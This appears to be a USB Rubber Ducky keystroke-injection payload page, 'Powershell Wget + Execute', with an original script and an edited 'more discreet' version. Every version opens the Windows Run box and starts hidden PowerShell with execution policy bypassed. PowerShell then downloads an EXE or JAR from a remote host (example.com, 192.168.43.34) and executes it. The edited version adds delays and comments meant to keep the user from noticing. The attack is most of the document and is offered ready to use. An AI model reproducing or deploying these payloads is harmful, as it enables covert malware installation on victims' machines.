Powershell Wget + Execute Author: mubix Duckencoder: 1.3 Target: Windows 7 Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies. GUI r DELAY 100 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\"" ENTER Note -windowstyle hidden hides the powershell window. Also mind the escaped quotes around $env:temp, otherwise the environment variable won't expand. Edited by: Fahad Alkamli This is an improved version for the code above. In my opinion the user should see as minimum as possible so writing a whole line of code in the run is not discreet. ``` REM You can remove this Delay line in the beginning (I just rather having it just in case) DELAY 60000 REM open the Run GUI r REM Change this value depending on the computer you are using ( i mean slow or not ) DELAY 100 STRING powershell -windowstyle hidden ENTER REM the shell usually takes a few seconds to fully run so i put a delay just in case . DELAY 1000 REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter. REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser STRING $source = "File URL "; $destination = "Path\FileName"; Invoke-WebRequest $source -OutFile $destination; ENTER DELAY 5000 STRING start-process FileName.EXE ENTER DELAY 100 STRING exit ENTER ``` Full Example with Jar: ``` REM You can remove this Delay line in the beginning (I just rather having it just in case) DELAY 60000 REM open the Run GUI r REM Change this value depending on the computer you are using ( i mean slow or not ) DELAY 100 STRING powershell -windowstyle hidden ENTER REM the shell usually takes a few seconds to fully run so i put a delay just in case . DELAY 1000 REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter. REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser STRING $source = "http://192.168.43.34/Service.jar"; $destination = "Service.jar"; Invoke-WebRequest $source -OutFile $destination; ENTER DELAY 5000 STRING start-process Service.jar ENTER DELAY 100 STRING exit ENTER ```